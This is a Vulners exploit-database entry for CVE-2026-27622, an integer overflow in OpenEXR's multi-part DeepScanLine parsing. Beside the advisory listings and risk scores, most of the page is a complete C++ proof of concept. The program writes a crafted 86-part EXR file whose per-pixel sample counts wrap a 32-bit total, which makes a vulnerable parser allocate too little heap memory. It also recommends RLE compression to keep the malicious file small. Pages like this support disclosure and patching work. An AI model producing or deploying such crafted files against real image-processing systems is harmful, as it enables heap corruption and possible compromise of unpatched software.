Vulners
Lucene search
📄 OpenEXR Integer Overflow
| Reporter | Title | Published | Views | Family All 130 |
|---|---|---|---|---|
 | CVE-2026-27622 | 3 Mar 202622:42 | – | attackerkb |
 | Amazon Linux 2023 : openexr, openexr-devel, openexr-libs (ALAS2023-2026-1481) | 30 Mar 202600:00 | – | nessus |
| AlmaLinux 10 : openexr (ALSA-2026:7682) | 15 Apr 202600:00 | – | nessus |
| AlmaLinux 8 : OpenEXR (ALSA-2026:8863) | 30 Apr 202600:00 | – | nessus |
| AlmaLinux 9 : openexr (ALSA-2026:8888) | 20 Apr 202600:00 | – | nessus |
| Fedora 42 : mingw-openexr (2026-45845d11c3) | 17 Mar 202600:00 | – | nessus |
| Fedora 44 : mingw-openexr (2026-4656ccedf8) | 16 Mar 202600:00 | – | nessus |
| Fedora 43 : mingw-openexr (2026-f958585e24) | 16 Mar 202600:00 | – | nessus |
| MiracleLinux 9 : openexr-3.1.1-3.el9_7.1 (AXSA:2026-479:01) | 21 Apr 202600:00 | – | nessus |
| MiracleLinux 8 : OpenEXR-2.2.0-12.el8_10.1 (AXSA:2026-542:02) | 4 May 202600:00 | – | nessus |
10
=============================================================================================================================================
| # Title : OpenEXR DeepScanLine Multi Part Files Integer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://openexr.com/ |
=============================================================================================================================================
[+] Summary : This C++ poc CVE-2026-27622 a potential integer overflow condition when processing specially crafted multi‑part DeepScanLine EXR files.
The program generates a malicious .exr file containing 86 parts, where each pixel is assigned 50,000,000 samples.
When these values are summed internally using a 32‑bit unsigned integer, the total sample count exceeds the maximum value (≈4.29 billion) and wraps around due to integer overflow.
Real total samples per pixel: 4,300,000,000 Wrapped 32‑bit value: 5,032,704
Because of this overflow, a vulnerable parser may allocate far less memory than required, which can lead to heap corruption or buffer overflow conditions during processing.
The PoC only generates the crafted EXR structure to illustrate the issue. In real research scenarios, techniques such as compression (e.g., RLE) could be used to keep the malicious file size small while still representing extremely large sample counts.
[+] affected :
affected at >= 2.3.0, < 3.2.6
affected at >= 3.3.0, < 3.3.8
affected at >= 3.4.0, < 3.4.6
[+] POC :
#include <ImfMultiPartOutputFile.h>
#include <ImfDeepScanLineOutputPart.h>
#include <ImfHeader.h>
#include <ImfChannelList.h>
#include <ImfArray.h>
#include <iostream>
#include <vector>
#include <string>
using namespace Imf;
using namespace Imath;
using namespace std;
int main() {
const char* filename = "exploit_deep_overflow.exr";
const int width = 128;
const int height = 1;
const int numParts = 86;
const unsigned int maliciousSampleCount = 50000000;
cout << "[+] Preparing " << numParts << " malicious parts..." << endl;
vector<Header> headers;
for (int i = 0; i < numParts; ++i) {
Header h(width, height);
h.setType(DEEPSCANLINE);
h.channels().insert("Z", Channel(FLOAT));
h.channels().insert("A", Channel(FLOAT));
h.setName("part_" + to_string(i));
// Use RLE compression to keep the file size small on disk
h.compression() = RLE_COMPRESSION;
headers.push_back(h);
}
try {
MultiPartOutputFile file(filename, headers.data(), headers.size());
for (int i = 0; i < numParts; ++i) {
DeepScanLineOutputPart part(file, i);
Array2D<unsigned int> sampleCounts(height, width);
for (int y = 0; y < height; ++y) {
for (int x = 0; x < width; ++x) {
sampleCounts[y][x] = maliciousSampleCount;
}
}
// Bind the sample count table
DeepFrameBuffer frameBuffer;
frameBuffer.insertSampleCountVarying(
"sampleCount",
(char*)(sampleCounts[0]),
sizeof(unsigned int),
sizeof(unsigned int) * width
);
part.setFrameBuffer(frameBuffer);
part.writePixels(height);
if (i % 10 == 0) cout << "[>] Writing part " << i << "..." << endl;
}
cout << "\n[SUCCESS] Malicious file generated: " << filename << endl;
cout << "[!] Target: CompositeDeepScanLine::readPixels" << endl;
cout << "[!] Expected Overflow: 4.3B samples -> 5.03M allocated" << endl;
} catch (const std::exception& e) {
cerr << "[-] Error: " << e.what() << endl;
return 1;
}
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.8
CVSS 48.4
EPSS0.00023
SSVC